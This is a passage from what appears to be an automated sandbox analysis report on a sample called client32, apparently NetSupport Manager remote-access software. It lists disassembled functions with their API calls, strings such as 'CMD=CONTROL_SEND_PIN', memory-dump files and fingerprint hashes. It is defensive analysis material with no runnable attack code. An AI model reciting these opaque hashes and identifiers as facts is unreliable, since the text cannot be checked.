                                                                                                                                          • Part of subcall function 688FD140: WaitForSingleObject.KERNEL32(00000300,000000FF,00000001,00000000), ref: 688FD1E1
                                                                                                                                          • Part of subcall function 688FD140: EnterCriticalSection.KERNEL32(6893B898), ref: 688FD212
                                                                                                                                          • Part of subcall function 688FD140: LeaveCriticalSection.KERNEL32(6893B898), ref: 688FD223
                                                                                                                                        Strings
                                                                                                                                        • ctl_call - Cound not get gateway index from name, xrefs: 6890685B
                                                                                                                                        • CallByName, xrefs: 68906808
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalProcessSection_memset$CurrentEnterFileLeaveModuleNameObjectOpenSingleWait_strncpy
                                                                                                                                        • String ID: CallByName$ctl_call - Cound not get gateway index from name
                                                                                                                                        • API String ID: 2957942747-1711757507
                                                                                                                                        • Opcode ID: c3401575c78a93cff82e8579f9de6a83ff87ca1f153a7fce06f34d59b7ed08ea
                                                                                                                                        • Instruction ID: 0afd07e2171f5cd4823504f25c5befc5c0b9f304138c3c9a5f36b560f95e3fc3
                                                                                                                                        • Opcode Fuzzy Hash: c3401575c78a93cff82e8579f9de6a83ff87ca1f153a7fce06f34d59b7ed08ea
                                                                                                                                        • Instruction Fuzzy Hash: D45129B9D043189BDB11CB68DC41BA977A8DF59318F8001ECDF196B281EB31DE85C7A1
                                                                                                                                        Function 68900C40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68900D9C
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68900DB1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: DATA$NAME
                                                                                                                                        • API String ID: 1338273076-4000142801
                                                                                                                                        • Opcode ID: db91d4318c7874b5e917ba1ccdf078936da98b8979a190488d350a8b53801ead
                                                                                                                                        • Instruction ID: e5d4e3de761a499cfcf0458ac09683b22c8ca33018296552d2fd52aacaff2898
                                                                                                                                        • Opcode Fuzzy Hash: db91d4318c7874b5e917ba1ccdf078936da98b8979a190488d350a8b53801ead
                                                                                                                                        • Instruction Fuzzy Hash: A841FBB5C0425DAFDF10DFE9D8809EEBBB8FB58214F90452EE426A7240E7349A05CF91
                                                                                                                                        Function 68906170 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 6890619F
                                                                                                                                          • Part of subcall function 689033A0: wsprintfA.USER32 ref: 689034FD
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __vswprintf_free_memset_sprintfwsprintf
                                                                                                                                        • String ID: CMD=CONTROL_SEND_PIN$PIN=%s$PINserver
                                                                                                                                        • API String ID: 2968883096-3759296614
                                                                                                                                        • Opcode ID: a7c7aaf5800cce2687253dfba2da5d1a5662c096839b88411b0ff7a01efb53a6
                                                                                                                                        • Instruction ID: 509958bcb72e9b906cf60c8f7e44f78e56b67c0c4fee103601963b0cab9d22d3
                                                                                                                                        • Opcode Fuzzy Hash: a7c7aaf5800cce2687253dfba2da5d1a5662c096839b88411b0ff7a01efb53a6
                                                                                                                                        • Instruction Fuzzy Hash: D7315875D10228AADB20DB78DC41FEE77B8AB89214F5086D9E50DE7181DF319A85CF60
                                                                                                                                        Function 688F6CAD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 688F6D0A
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 688F6D72
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc
                                                                                                                                        • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                                        • API String ID: 190572456-1434219782
                                                                                                                                        • Opcode ID: 9d47eb442f11df653a0b13a46717c574d5f32f343789f6575f3d678680e18a56
                                                                                                                                        • Instruction ID: 40ef6235404972733b229111f8bbbca22878fde559c7484a979dd1f4d39e39f8
                                                                                                                                        • Opcode Fuzzy Hash: 9d47eb442f11df653a0b13a46717c574d5f32f343789f6575f3d678680e18a56
                                                                                                                                        • Instruction Fuzzy Hash: C73157769041A99FCB20EF68CCC0A98B7F4FF49384B5049B9E688DB201C271ADC6CF10
                                                                                                                                        Function 6890C600 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: IsA()$NSMString.cpp$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                                                        • API String ID: 4104443479-152930664
                                                                                                                                        • Opcode ID: 333b2a24185dd4a248711e0823da29cd379dc263914fcaeec30c7da2e0af3f98
                                                                                                                                        • Instruction ID: 8df893ec3134b87433acea7e71d67a4ee692f17654bf6ac90a6757447e571f93
                                                                                                                                        • Opcode Fuzzy Hash: 333b2a24185dd4a248711e0823da29cd379dc263914fcaeec30c7da2e0af3f98
                                                                                                                                        • Instruction Fuzzy Hash: 03212636A446166FC3208B5CDC94E6BB3A99FD934CF50442DF9999B201DB31E80982E5
                                                                                                                                        Function 68907970 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • #16.WSOCK32(?,?,?,00000000), ref: 689079F1
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 68907A16
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID: hbuf->data$httputil.c
                                                                                                                                        • API String ID: 1452528299-2732665889
                                                                                                                                        • Opcode ID: 554ac6ba0374d18b8f65c29dd003b627179795ac3222cbaa903b706b84883db2
                                                                                                                                        • Instruction ID: d5661df3e0a3131e3f62600e35a374b71cecdaa763ceaa3f61fccffe385a6745
                                                                                                                                        • Opcode Fuzzy Hash: 554ac6ba0374d18b8f65c29dd003b627179795ac3222cbaa903b706b84883db2
                                                                                                                                        • Instruction Fuzzy Hash: 12215E7A604B05AFD320CE6DD840A27B7F9EF95768B55C82DD8EA87601D732F8018B90
                                                                                                                                        Function 689075B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 689075D8
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                                        • String ID: VUUU$buf$e:\nsmsrc\nsm\1210\1210f\ctl32\uuencode.c
                                                                                                                                        • API String ID: 501242067-1152951737
                                                                                                                                        • Opcode ID: 25bca52c15d771c8179490ad605ec25eb8d7b8406ea1bca67677efcefa5da116
                                                                                                                                        • Instruction ID: c5f2a36aad180089747702d4ac6979c6f22bbfcebbb6619f93b662f6dcb4a531
                                                                                                                                        • Opcode Fuzzy Hash: 25bca52c15d771c8179490ad605ec25eb8d7b8406ea1bca67677efcefa5da116
                                                                                                                                        • Instruction Fuzzy Hash: 4B2198325085866BC3018F2D8C502D5BBFA9FCA228B5CC069F8D99F342E973E906C7D1
                                                                                                                                        Function 689114C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 689114D9
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                                        • String ID: c != '\0'$dstbuf$yenc.c
                                                                                                                                        • API String ID: 501242067-509959809
                                                                                                                                        • Opcode ID: 81c97809a37fc9361389307178e1698a5be50f79c7aa2aae380570b9e2229c41
                                                                                                                                        • Instruction ID: 211544875c2aa442fa31949dfaec98eed6cfa8787526a1692f3a136ffc5607f8
                                                                                                                                        • Opcode Fuzzy Hash: 81c97809a37fc9361389307178e1698a5be50f79c7aa2aae380570b9e2229c41
                                                                                                                                        • Instruction Fuzzy Hash: 8F210A75B89218AFC701DF28A84069DB7B4EFD2368F544165ECE597380E631CA06D791
                                                                                                                                        Function 11031170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(A0A8B03E,00000000,?,A0A8B03E,1118736B,000000FF,?,11066188,NSMWClass,A0A8B03E,?,1106DC18), ref: 110311AA
                                                                                                                                        • __strdup.LIBCMT ref: 110311F5
                                                                                                                                          • Part of subcall function 110310B0: LoadLibraryA.KERNEL32(Kernel32.dll,A0A8B03E,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
                                                                                                                                          • Part of subcall function 110310B0: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
                                                                                                                                          • Part of subcall function 110310B0: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
                                                                                                                                          • Part of subcall function 110310B0: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressCurrentFreeLoadProcProcessVersion__strdup
                                                                                                                                        • String ID: NSMWClass$NSMWClassVista
                                                                                                                                        • API String ID: 319803333-889775840
                                                                                                                                        • Opcode ID: 46a647a9c5bb73cbf9c610ab71be3ff3dfedca409816ccc490a05da233c0cef1
                                                                                                                                        • Instruction ID: da22cb9b74e46dcd904e816c1cfbcb9dca7c1c5d087ee23a6b3981c0c6242146
                                                                                                                                        • Opcode Fuzzy Hash: 46a647a9c5bb73cbf9c610ab71be3ff3dfedca409816ccc490a05da233c0cef1
                                                                                                                                        • Instruction Fuzzy Hash: 2721D272E286855FD701CF688C407EAFBFAAB8A625F4086A9EC55C7780E736D805C750
                                                                                                                                        Function 688F6CE7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 688F6D0A
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 688F6D72
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc
                                                                                                                                        • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                                        • API String ID: 190572456-1434219782
                                                                                                                                        • Opcode ID: f61f7d0d41705b2bddadd8ae6b2dcdd88e7011fcc8a5ddb51cb97dbc3cac1dc2
                                                                                                                                        • Instruction ID: 9a04e7462a0c233d6aa00a9f75ff86f01e5b570722fc2c668020740a09607ade
                                                                                                                                        • Opcode Fuzzy Hash: f61f7d0d41705b2bddadd8ae6b2dcdd88e7011fcc8a5ddb51cb97dbc3cac1dc2
                                                                                                                                        • Instruction Fuzzy Hash: 18218C769041A99FDB30EF54C880AE8B3B4FB48385F5049BDEA98D7201D6719DC6CF00
                                                                                                                                        Function 688F60D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F6107
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000000,?,?,?,?,?,?,?,?,?,?,?,-000397EB), ref: 688F6129
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,-000397EB,?,?,68903361), ref: 688F6168
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave__wcstoui64strtoxl
                                                                                                                                        • String ID: CONNECTION_ID
                                                                                                                                        • API String ID: 2450600163-332495620
                                                                                                                                        • Opcode ID: 2eb65a8e2d31aa7db00276e91a4df677d3533f3c606b9271d6059ac4206366a2
                                                                                                                                        • Instruction ID: b2195a96d0d97817af5fc529a72607fbd610fcddbacdf7f2c8681e0d19a098e5
                                                                                                                                        • Opcode Fuzzy Hash: 2eb65a8e2d31aa7db00276e91a4df677d3533f3c606b9271d6059ac4206366a2
                                                                                                                                        • Instruction Fuzzy Hash: 15112B7A9086107BEF3086E89C4071F37659F423D4F980935FA56D7603E771E98386A3
                                                                                                                                        Function 688F6BD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 688F6C0F
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F6C2E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: *$InternetQueryOptionA
                                                                                                                                        • API String ID: 199729137-4161725205
                                                                                                                                        • Opcode ID: 1c04e192cfa0c7acc0d7923de3344ac43d8a1806ecd04ee26a8bbfa9b3a4d087
                                                                                                                                        • Instruction ID: 9c2e485770bdc1f8343c464cad60ccc56841a92918b06a87025da1406f10ae9c
                                                                                                                                        • Opcode Fuzzy Hash: 1c04e192cfa0c7acc0d7923de3344ac43d8a1806ecd04ee26a8bbfa9b3a4d087
                                                                                                                                        • Instruction Fuzzy Hash: F4215371904218DFCB70DF68D841A9DBBF4FB4A314F504659E956A7240D7746A41CF90
                                                                                                                                        Function 11141170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
